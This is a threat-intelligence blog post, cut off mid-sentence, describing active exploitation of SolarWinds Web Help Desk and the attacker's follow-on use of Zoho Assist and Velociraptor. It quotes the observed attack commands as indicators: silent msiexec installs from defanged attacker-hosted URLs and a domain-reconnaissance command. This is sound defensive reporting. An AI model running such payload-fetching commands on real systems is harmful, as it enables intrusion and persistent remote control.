Home Blog Active Exploitation of SolarWinds Web Help Desk Published: February 8, 2026 Active Exploitation of SolarWinds Web Help Desk By: Anna Pham John Hammond Jamie Levy Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up. TL;DR : Huntress has observed threat actors exploiting SolarWinds Web Help Desk vulnerability across 3 customers; organizations should apply the update from SolarWinds’ website as soon as possible. Background On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control. This intrusion stemmed from the many recently disclosed vulnerabilities affecting SolarWinds WHD. The most critical vulnerabilities grant an adversary arbitrary code execution via untrusted deserialization -- CVE-2025-40551 was recently added to CISA’s Known Exploited Vulnerabilities database, and CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation. All previous versions of SolarWinds Web Help Desk prior to 12.8.7 HF1 are vulnerable to these vulnerabilities. You can find the version of your SolarWinds WHD at this path: C:\Program Files\WebHelpDesk\version.txt Figure 1: A view of SolarWinds Web Help Desk Across our partner base, Huntress protects 84 endpoints across 78 organizations using SolarWinds Web Help Desk. Have you heard the news about SolarWinds WebhubDesk being actively exploited? I cannot wait to tell you about all the CodeTradecrafts. So after getting the remote code execution, the threat to drive Velociraptor as a C2 framework. And Velociraptor is a well known DFIR tool that some of you might have used before in the past. But here are the things get really interesting. So the ThreatActor spun out their own Elastic Cloud instance and start shipping system information from compromised endpoints right into it. They literally built the whole SOC dashboard to manage their own victims at scale. Using our own defenders tools against us? Nice try. Huntress observations Zoho Assist, but make it malicious Huntress observed active post-exploitation activity stemming from this compromised SolarWinds Web Help Desk (WHD) instance. The attack chain originated from wrapper.exe , the WHD service wrapper, which spawned java.exe , the underlying Tomcat-based WHD application. The Java process then launched cmd.exe to silently install a remote MSI payload via this command: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi The adversary leveraged the file-hosting service Catbox to stage a Zoho ManageEngine RMM agent, a legitimate remote management tool that may be abused by threat actors to maintain persistent, hands-on access to the compromised environment. This activity aligns with Microsoft's February 6 advisory on active exploitation of SolarWinds Web Help Desk, confirming that threat actors are actively weaponizing WHD vulnerabilities to achieve remote code execution and deploy additional tooling in victim environments. Interestingly, the Zoho Assist agent was configured for unattended access, registering the compromised host to a Zoho Assist account tied to a Proton Mail address, esmahyft@proton[.]me . Once the Zoho ManageEngine RMM agent was established, the threat actor wasted no time pivoting to hands-on-keyboard activity. Using the RMM agent process ( TOOLSIQ.EXE ) as their operational foothold, they executed Active Directory discovery commands to enumerate domain-joined machines via net group "domain computers" /do , a textbook reconnaissance technique aimed at identifying viable targets for lateral movement. Figure 2: Huntress detection of domain reconnaissance and MSI payload delivery spawned from the WHD service process (TOOLSIQ.EXE) Shortly after the initial reconnaissance, the threat actor leveraged the Zoho Assist remote session to deploy Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, to the compromised host. The installation was performed via a silent MSI execution, pulling the installer from an attacker-controlled Supabase storage bucket: msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi Who's running Velociraptor? Not the Blue Team . While Velociraptor is designed to help defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via VQL queries, make it equally effective as a C2 framework when pointed at attacker-controlled infrastructure. The uncovered Velociraptor configuration file had some interesting components: Loading Gist... This demonstrates the adversary using Velociraptor version 0.73.4, a known outdated version of Velociraptor with a privilege escalation vul